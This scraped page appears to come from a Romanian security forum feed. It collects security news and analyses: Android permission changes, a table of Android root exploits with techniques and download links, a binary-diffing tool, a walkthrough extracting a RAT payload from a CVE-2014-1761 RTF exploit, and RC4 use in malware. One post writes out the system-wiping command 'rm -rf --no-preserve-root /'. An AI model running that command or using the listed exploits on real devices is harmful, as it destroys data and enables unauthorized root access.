Nytro

Super, si eu voiam sa fac asa ceva. Cred ca ar fi mai optim sa gasesti dimensiunile fisierelor si sa calculezi hash-ul doar pentru cele cu aceeasi dimensiune.

Surse de rootkit-uri

Draga Antonescu, (nu Crin) ...

Am folosit doar versiunea free. Bine, parca gasisem si o versiune mai veche crackuita, dar nu am ramas surprins de el.

Android's New App Permissions Setup Raises Red Flags By Eduard Kovacs on June 13, 2014 Google has recently made changes to the way permissions for Android applications are displayed, but experts warn that the modifications make automatic updating of mobile applications riskier than before. Under the new format, permissions requested by Android applications are organized into groups to simplify the installation process and help users make informed decisions about whether or not they want to install a certain app, Google developers noted. The problem, as highlighted by many security experts, is the fact that if a user gives an app access to a certain permission category, when the app is updated, it can start using other permissions in the same category without informing the user. “Once you’ve allowed an app to access a permissions group, the app may use any of the individual permissions that are part of that group. You won’t need to manually approve individual permissions updates that belong to a permissions group you’ve already accepted,” Google explained. For example, if an application needs to read text messages, the user must give it access to the “SMS” permissions group. If the app is updated, it can automatically access all other individual permission in the “SMS” group ? such as edit text messages, send SMS messages and receive text messages ? without the user being notified. Furthermore, Google has decided to remove network communication permissions from the primary permissions screen on the basis that most apps need access to the Web in order to work. The company said it was removing apps that violate Google Play policies, and noted that systems are in place to protect users against potentially harmful elements. Georgia Weidman, the CEO of Bulb Security, told SecurityWeek that the changes are a “step in the complete wrong direction.” “Most users don't really care about permissions anyway, but it seems a red flag to me that if you've accepted something in a certain group you don't get notified of additional permissions in that group on update,” Weidman said. “Google hopes to solve the problem of apps not autoupdating by grouping permissions into categories. But you risk apps being able to silently add new permissions when they update,” Marc Rogers, principal security researcher at Lookout, told SecurityWeek in an emailed statement. “Under the new system Google will only notify users if an app requests permissions in a group the user hasn't already accepted. People need to understand that they are essentially allowing all permissions in a given category.” “Right now the best advice to users who are concerned about permissions is that you should go into the Play store and change the settings for apps to turn off autoupdate for any app that you do not implicitly trust,” Rogers said. This way the app has to be manually updated and you get a chance to check its permissions with each install.” There are also several threads on Reddit highlighting the negative impact these changes have on security and privacy. Sursa: Android's New App Permissions Setup Raises Red Flags | SecurityWeek.Com

[TABLE=width: 100%] [TR] [TD]Android Cheatsheet (updates to dweinst@insitusec.com) : Vuln/Exploit List (privesc)[/TD] [/TR] [/TABLE] [TABLE=class: tblGenFixed] [TR=class: rShim] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s0]Vulnerability/Exploit name[/TD] [TD=class: s1]release date[/TD] [TD=class: s1]author[/TD] [TD=class: s1]effect (root, unlock,...)[/TD] [TD=class: s1]notes[/TD] [TD=class: s1]link[/TD] [TD=class: s2][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]psneuter[/TD] [TD][/TD] [TD=class: s4]scotty2[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]https://github.com/tmzt/g2root-kmod/blob/master/scotty2/psneuter/psneuter.c[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Exploid[/TD] [TD=class: s5]7/15/2010[/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]C-skills: android trickery[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]GingerBreak[/TD] [TD=class: s5]5/26/2011[/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]C-skills: yummy yummy, GingerBreak![/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]RageAgainstTheCage[/TD] [TD][/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]KillingInTheNameOf[/TD] [TD][/TD] [TD=class: s4]Stealth[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]C-skills: adb trickery #2[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Zimperlich[/TD] [TD=class: s5]2/24/2011[/TD] [TD=class: s4]Stealth[/TD] [TD][/TD] [TD][/TD] [TD=class: s4]C-skills: Zimperlich sources[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Zergrush[/TD] [TD][/TD] [TD=class: s4]Revolutionary[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]https://github.com/revolutionary/zergRush/blob/master/zergRush.c[/TD] [TD=class: s4]Revolutionary - zergRush local root 2.2/2.3 [22-10: Samsung/SE update] - xda-developers[/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Tacoroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]HTC Recovery symlink attack to local.prop from /data/recovery/something bliss found first, but was too slow![/TD] [TD=class: s4]https://github.com/CunningLogic/TacoRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Nachoroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]AMI304 Magnetic Sensor, symlink to local.prop. [/TD] [TD=class: s4]https://github.com/CunningLogic/NachoRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Burritoroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Typo prevented app from sending a debugging intent, caused adb to run as root[/TD] [TD=class: s4]https://github.com/CunningLogic/BurritoRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Gorditaroot[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]install custom recovery or root[/TD] [TD=class: s4]Similar to Nachoroot, different path, AMI304 Magnetic Sensor, symlink to recovery mtd device[/TD] [TD=class: s4]https://github.com/CunningLogic/GorditaRoot[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Enchilada[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]System left r/w & Internal memory left as ext4? I think. Symlink attack from DCIM dir to install-recovery.sh[/TD] [TD=class: s4]https://github.com/CunningLogic/Enchilada[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ZTERoot (Avail)[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]~70 rediculous intents left over from engineering. Stupid OEM.[/TD] [TD=class: s4]https://github.com/CunningLogic/ZTERoot[/TD] [TD=class: s4][Exclusive] Developer Codes Left In Retail ZTE Avail (AT&T) Offer Quick And Easy Root Access[/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ZTERoot (Merrit)[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Symlink attack from debugging/logging app[/TD] [TD=class: s4][ROOT] ZTE z990g Merit (An avail variant?) - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG ICS Root[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Symlink attack[/TD] [TD=class: s4][ROOT] LG Intuition & LG Spectrum ICS - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]DefyXT Root[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s6]Unprotected intent allowing various permission changes.[/TD] [TD=class: s4][Root] Republic Wireless Motorola Defy XT - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Cyanide[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]DeftXT Root Loggerlancher changing permissions, system mounted r/w[/TD] [TD=class: s4]https://github.com/CunningLogic/Cyanide[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Optimus Logic[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Optmus Elite[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]LG not verifying integrity of system partition when flashing through download mode. TOT images are patchable. Probably valid on all LG devices.[/TD] [TD=class: s4][Exclusive] How To Root The Virgin Mobile LG Optimus Elite[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Pantech[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Pantach does not verify integerty of system partition when flashing through download mode. PDL images are patchable.[/TD] [TD=class: s4]unpublished[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]HTC DNA[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]enable unlocking[/TD] [TD=class: s4]Backupmanger sets /data 777, then symlink to mmbblk0p5 to change CID. Not root, but enables bootloader unlock[/TD] [TD=class: s4][unlock] Bootloader unlock - Updated November 26th 2012 - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]HTC One X AT&T[/TD] [TD][/TD] [TD=class: s4]jcase[/TD] [TD=class: s4]root[/TD] [TD=class: s4]HTC Ready2go webapp triggering chmod 777 on file in world writable dir. Lasted whole 4 hours.[/TD] [TD=class: s4][Exclusive] How To Root The AT&T HTC One X On Version 1.85 (Or Earlier)[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Hisense Pulse[/TD] [TD][/TD] [TD=class: s4]cj_000[/TD] [TD=class: s4]root[/TD] [TD=class: s4]ro.debuggable=1 on initial firmware[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Generic LG[/TD] [TD][/TD] [TD=class: s7]?[/TD] [TD=class: s4]root[/TD] [TD=class: s4]ro.debuggable=1 on some older LGs[/TD] [TD=class: s4]unpublished[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG ADB Backdoor[/TD] [TD][/TD] [TD=class: s4]Giantpune[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Backdoor, restarts adb as root with key[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Poot[/TD] [TD][/TD] [TD=class: s4]Giantpune[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Qualcomm diag device[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Lit[/TD] [TD][/TD] [TD=class: s4]Giantpune[/TD] [TD=class: s4]root[/TD] [TD=class: s4]LG Backlight[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ZTE Backdoor[/TD] [TD][/TD] [TD=class: s4]"Anonymous"[/TD] [TD=class: s4]root[/TD] [TD=class: s4]binary spawned root shell, password protected.[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]HTC Eris 2.1 Root[/TD] [TD][/TD] [TD=class: s4]wag3slav3[/TD] [TD=class: s4]install custom recovery[/TD] [TD=class: s4]symlink attack from /data/local/something to recovery block device[/TD] [TD=class: s4]? XDA Forums[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Droid 3 Root[/TD] [TD=class: s5]8/25/2011[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack from /data/local/something to local.prop[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Motofail[/TD] [TD=class: s5]2/11/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/dontpanic and /data/logger[/TD] [TD=class: s4]http://vulnfactory.org/public/motofail_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]XYZ[/TD] [TD=class: s5]2/17/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /pds/public/battd, /data/dontpanic, and /data/logger[/TD] [TD=class: s4]http://vulnfactory.org/public/xyz_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Spectrum Root[/TD] [TD=class: s5]2/19/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/gpscfg/gps_env.conf[/TD] [TD=class: s4]http://vulnfactory.org/public/spectrum_root_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Megatron[/TD] [TD=class: s5]2/26/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on com.ti.fmrxapp[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]LG Esteem Root[/TD] [TD=class: s5]2/15/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/bootlogo/bootlogopid[/TD] [TD=class: s4]http://vulnfactory.org/public/LG_Esteem_Root_v2_Windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Razr's Edge[/TD] [TD=class: s5]6/21/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/local/12m[/TD] [TD=class: s4]http://vulnfactory.org/public/razrs_edge_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Razr Blade[/TD] [TD=class: s5]1/15/2013[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/dontpanic, overwriting SmartActions .jar file to run code as system[/TD] [TD=class: s6]http://vulnfactory.org/public/razr_blade.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]X-Factor[/TD] [TD=class: s5]10/23/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]change CID[/TD] [TD=class: s4]symlink attack on telephony ADB restore to change permissions on /dev/diag, followed by kernel exploit (same as Poot)[/TD] [TD=class: s4][ROOT] HTC One X AT&T 2.20 Firmware - X-Factor root exploit - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Samsung Admire Root[/TD] [TD=class: s5]9/12/2011[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/log/dumpState_app_native.log[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Thinkpad Tablet[/TD] [TD=class: s5]1/22/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on Lenovo Mobility Manager[/TD] [TD=class: s4]http://vulnfactory.org/public/Thinkpad_Root_Windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Sony Tablet S[/TD] [TD=class: s5]2/8/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /log to change package.list, followed by symlink attack on "pm" (replace "lib" directory of system app to remove arbitrary files)[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Xoomfail[/TD] [TD=class: s5]2/18/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]cmdclient changed perms on /data to 0777 by design[/TD] [TD=class: s4]Security Research by Dan Rosenberg[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Motofail2Go[/TD] [TD=class: s5]10/16/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on data directory for bug2go[/TD] [TD=class: s4]http://vulnfactory.org/public/motofail2go_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]XPRT[/TD] [TD=class: s5]10/8/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/dontpanic[/TD] [TD=class: s4]http://vulnfactory.org/public/xprt_root_windows.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Nandpwn[/TD] [TD=class: s5]8/4/2012[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Ridiculousness on Logitech Revue[/TD] [TD=class: s4]https://github.com/djrbliss/revue/tree/master/nandpwn[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Motochopper[/TD] [TD=class: s8]4/9/2013[/TD] [TD=class: s4]bliss[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]http://vulnfactory.org/public/motochopper.zip[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]ADB Restore Root[/TD] [TD][/TD] [TD=class: s4]bin4ry[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Exynos-abuse[/TD] [TD][/TD] [TD=class: s4]alephzain[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Access to system memory through /dev/exynos-mem on Exynos devices[/TD] [TD=class: s4][ROOT][sECURITY] Root exploit on Exynos - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]IconiaRoot[/TD] [TD][/TD] [TD=class: s4]alephzain[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4][ROOT][sECURITY] Root exploit on Exynos - xda-developers[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]fr3vo[/TD] [TD][/TD] [TD=class: s4]Kevin Bruckert[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Arbitrary kernel write in Qualcomm's MSM rotator[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]levitator[/TD] [TD][/TD] [TD=class: s4]Jon Larimer, Jon Oberheide[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Out-of-bounds memory mapping in pvrsrvkm[/TD] [TD=class: s4]http://jon.oberheide.org/files/levitator.c[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]mempodroid[/TD] [TD][/TD] [TD=class: s4]saurik/zx2c4[/TD] [TD=class: s4]root[/TD] [TD=class: s4]Bad kernel jazz with /proc/pid/mem and suid binaries[/TD] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]asroot (Wunderbar?)[/TD] [TD][/TD] [TD=class: s4]zinx[/TD] [TD=class: s4]root[/TD] [TD][/TD] [TD=class: s4]http://code.google.com/p/flashrec/source/browse/#svn%2Ftrunk%2Fandroid-root[/TD] [TD][/TD] [/TR] [TR] [TD=class: hd]. [/TD] [TD=class: s3]Samsung Infuse 4G[/TD] [TD=class: s5]1/3/2012[/TD] [TD=class: s4]Michael Coppola[/TD] [TD=class: s4]root[/TD] [TD=class: s4]symlink attack on /data/data/.drm/.wmdrm/sample.hds[/TD] [TD=class: s4]Rooting the Samsung Infuse 4G | Michael Coppola's Blog[/TD] [TD][/TD] [/TR] [/TABLE] Publicat de Google Drive – Raporta?i un abuz – Se actualizeaz? automat la fiecare 5 minute

DarunGrim: A Patch Analysis and Binary Diffing Tool Introduction DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers. This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers. * DarunGrim 3: DarunGrim3 is an advanced version of DarunGrim2 which provides nice file management UI. Binaries: http://github.com/ohjeongwook/DarunGrim/downloads Source: http://github.com/ohjeongwook/DarunGrim License: New BSD License Documentation: DarunGrim 3 Installation & Usage Guide Blogs: Reverse Engineering | Reverse Engineering stuff Sursa: DarunGrim: A Patch Analysis and Binary Diffing Tool

Extracting the payload from a CVE-2014-1761 RTF document Monday June 9, 2014 Background In March Microsoft published security advisory 2953095, detailing a remote code execution vulnerability in multiple versions of Microsoft Office (CVE-2014-1761). A Technet blog was released at the same time which contained excellent information on how a typical malicious document would be constructed. NCC Group’s Cyber Defence Operations team used the information in the Technet blog to identify a malicious document within our malware zoo that exploited this vulnerability which appears to have been used in a targeted attack. In this blog we show one method of analysing the shellcode manually to extract the payload. Matching the malicious document The Technet blog gives a number of pointers toward a malicious document. First there is a bad header at the beginning of the document, which should be {\rtf in a real document but is {\rt{. Our sample matches this: The MSComctl object is a short way into the document, in this case an ImageComboCtl: And it is easy to identify the potential ROP chain: What will happen if the exploit is successful? If the exploit doesn’t work on our test systems, how can we manually extract the payload? We know that the document should contain something useful, either saving malicious embedded content or using a URL download/execute. But where is this shellcode? Analysing the shellcode After identifying the vulnerability we can now hunt for the shellcode which will run on successful exploitation. The Technet blog suggests the shellcode is placed near the end of the file so this is a good place to start. Upon loading into IDA the correct option to choose is 32-bit disassembly. Locating the shellcode How can we quickly identify what might be code? One common technique in shellcode is using the hashes of Windows APIs, searching for these can often yield good results. Running a small IDA Python script over the database returns some possible matches: The first four are probably misdetections but the following API names definitely look suspicious. All of them are toward the end of the file, which ends at 0x71CB1. Checking the results for Sleep() and ExitProcess() shows the following potential shellcode locations: Turning the bytes into code It is now possible to see where some of the hashed APIs might be used, which gives an indication of where the shellcode is located. We can begin to convert the unknown bytes into code (right click and choose “Code”, or use the shortcut ‘C’). If we accidentally choose the wrong place to start analysing then it is possible to end up with “”junk” results, as demonstrated below: We can fix this by undefining the junk code (right click, “Undefine” or shortcut ‘U’), then making code at a slightly different offset. Very quickly the disassembly starts looking like real code: Calling functions by hash We can now see that the API hash is placed in the EBX register before a function is called, which has been manually named CallByHash by us in the disassembly above. This function uses the standard mechanism of obtaining the PEB to find loaded modules: The correct API is found using a simple ROR 0x13 (19 decimal) loop until the generated hash matches the value in EBX where the desired hash is stored (see comparison instruction at 0x71A83). This allows the shellcode to locate and call any Windows API from kernel32.dll without knowing anything about the process which loaded the RTF file or including API name strings. Finding ourselves – where is the RTF file? The shellcode next needs to find the RTF file so it can locate and save the payload. It does this by iterating over all possible file handles until a valid one is found. This will always work because Word must have the RTF file open in order to parse it. The code below tries each possible handle in turn, starting from 0x4 until 0x4000. It then calls GetFileSize, ensuring that the handle is valid by checking the return code. The code which follows is responsible for finding the start of the payload and saving it to disk. The position is first reset to the start of the file (offset 0) using SetFilePointer. The loop below then looks for the characters S18t in the document and obtains the offset if the string is found. If the characters are not present then the shellcode tries the next handle until an open file containing S18t is located. Once the payload data is found it is unobfuscated with a simple XOR loop, seen below. This is important to note for when we extract the data manually later. Following this are standard calls to GetTempPathA, CreateDirectoryA, CreateFileA and WriteFile, which save the payload to disk. Finally the shellcode calls LoadLibraryExA to launch the payload and then sleeps before calling ExitProcess to terminate Microsoft Word cleanly. Unusual code or shellcode trickery? Other typical techniques are also evident, for example this simple sequence: The constant 0x40000000 (equivalent to GENERIC_WRITE permissions) is obtained by taking the number 0x41010101 and subtracting 0x1010101, avoiding null bytes in the shellcode. The same trick is used for some API hashes, for example CloseHandle below: A simple calculation shows that the hash for CloseHandle would be 0xED00C776, which contains a null byte. Extracting the payload With the information above we can extract the payload data from the document and decode the executable which will be run. By searching for the string S18t the start of data can be found. The bytes following S18t look suspiciously like an obfuscated PE header, using our earlier information about the usage of XOR 0x4 we can test to see if this is correct: From here we can copy all of the bytes from offset 0x6c38 to the end of the file and then apply XOR 0x4 to obtain a PE file. The resulting file will contain the shellcode at the end; this could be removed if desired. Loading the payload into IDA shows a well formed executable which allows us to begin further analysis. In this instance the payload was a 425KB executable which is often called the “havex RAT”. Crowdstrike attribute the use of this malware to a group called ENERGETIC BEAR in their Global Threat Report 2013. At the time of our analysis only 1 antivirus engine of 50 on VirusTotal detected the payload as malicious, once again highlighting the malicious code arms race. Conclusion Using the techniques described above it is possible to extract the payload even if the exploit is unreliable or we have an incomplete malicious document. This allows creation of network or host indicators that allow us to prevent or detect the malicious payload. It is also a useful reminder of the speed at which known attackers will use new exploits to distribute their existing malware. For further information: Follow us on twitter @NCCGroupInfosec for notifications of new blog articles. If you’re an existing customer please contact your account manager if you required tailored advice and consultancy, including incident response, forensics, malicious code analysis and cyber defence services. Sursa: https://www.nccgroup.com/en/blog/2014/06/extracting-the-payload-from-a-cve-2014-1761-rtf-document/

rm -rf remains Just for fun, I decided to launch a new Linux server and run rm -rf / as root to see what remains. As I found out, rm lives in the future with idiots like me, so you have to specify --no-preserve-root to kick this exercise off. # rm -rf --no-preserve-root / After committing this act of tomfoolery, great utilities like /bin/ls /bin/cat /bin/chmod /usr/bin/file will all be gone! You should still have your connection over SSH as well as your existing bash session. This means you have all the bash builtins, like echo. Articol complet: rm -rf remains

An Introduction to Recognizing and Decoding RC4 Encryption in Malware There is something that we come across almost daily when we analyze malware in the VRT: RC4. We recently came across CVE-2014-1776 and like many malware samples and exploits we analyze, RC4 is used to obfuscate or encrypt what it is really doing. There are many ways to implement RC4 and it is a very simple, small algorithm. This makes it very common in the wild and in various standard applications. Open-source C implementations can be found on several websites such as Apple.com and OpenSSL.org. What is RC4? RC4 was designed by Ron Rivest of RSA Security in 1987. RC4 is a fast and simple stream cipher that uses a pseudo-random number generation algorithm to generate a key stream. This key stream can be used in an XOR operation with plaintext to generate ciphertext. The same key stream can then be used in an XOR operation against the ciphertext to generate the original plaintext. While it is still common in malware, RC4 has been legitimately implemented in a number of areas where speed and privacy are of concern. In the past, both WEP and TLS both used RC4 to protect data sent across the wire. However, last Fall, Microsoft recommended that customers disable RC4 by enabling TLS1.2 and AES-GCM. For more information including a detailed history of RC4, check out the Wikipedia article. Why is it used in malware? Increasingly, we find that RC4 is used to encode data that is sent to a remote server to be decrypted on the other side using a pre-shared key. This makes detection a bit trickier (but not impossible) and also makes it harder to determine exactly what is being sent across the wire. What we will usually do when we think we’ve come across some sort of encryption is determine the source of it and whether the data being sent is static (for matching purposes) and what exactly that data is. Articol complet: VRT: An Introduction to Recognizing and Decoding RC4 Encryption in Malware

CentOS 7 Public QA Release Friday , 13, June 2014 Jeff Sheltren We are happy to announce the immediate availability of the first CentOS 7 QA Release. !!! This is a QA release only and not the final CentOS 7 release !!! In the past, CentOS QA testing has been performed by a small group of people within the CentOS community. We are happy that we are now able to open this up to the wider community to get early feedback and bug reports prior to the 7 release. CentOS 7 QA release is available for download at: Index of / We are first populating individual RPMs in their respective build directories. Once there is a working base install tree, it will be made available at the same URL. Please note the following: - This is NOT the final CentOS 7 release. Packages, ISOs, and install media *will* change between this release and the final 7 release. - The packages posted at the above URL will likely be updated in-place before the final release. - Things may be broken! Don’t install this on your production servers. Consider it a beta/preview release. - Help us make the 7 release better by reporting bugs at My View - CentOS Bug Tracker - This is not an officially supported release. If you have questions, aren’t sure if you’ve found a bug, etc., please ask in #centos-devel on Freenode, or email the centos-devel email list. - Packages in the QA release are *not* GPG-signed. The final 7 release will contain gpg-signed packages as usual. - Upgrading from the QA release to the final 7 release may be possible, but it’s not supported or documented in any way. Expect that you will need to re-install when 7 final is released. We appreciate any and all bug reports at My View - CentOS Bug Tracker (please also check upstream bugzilla.redhat.com and link to those bugs when filing a new CentOS issue), and assistance with the “Branding Hunt” (see [CentOS-devel] The Branding Hunt - howto). https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.0_Release_Notes/part-Red_Hat_Enterprise_Linux-7.0_Release_Notes-Known_Issues.html contains a list of known issues at the time of the upstream release. Currently, we only have RPM packages online, but will be bringing installable media online as soon as we have it ready. Again, this is NOT a final release. It may harm nearby puppies, kittens, or other (cute) animals and/or servers. This is our first attempt at opening up CentOS to the wider community, so please bear with us as we work through any issues that arise with the process. As always, feedback is welcome on the email list or on IRC (#centos-devel on Freenode). Edit: Even though we don’t yet have an installable tree in place, you can point an existing el7beta/el7rc install to the buildlogs repo with the following yum repo definitions (for example /etc/yum.repos.d/centos-buildlogs.repo) : [centos-qa-03] name=CentOS Open QA – c7.00.03 baseurl=Index of /c7.00.03 enabled=1 gpgcheck=0 [centos-qa-04] name=CentOS Open QA – c7.00.04 baseurl=Index of /c7.00.04 enabled=1 gpgcheck=0 Thanks, and enjoy the release! -Jeff Sheltren on behalf of the CentOS QA Team Sursa: CentOS 7 Public QA Release – Seven.CentOS.org

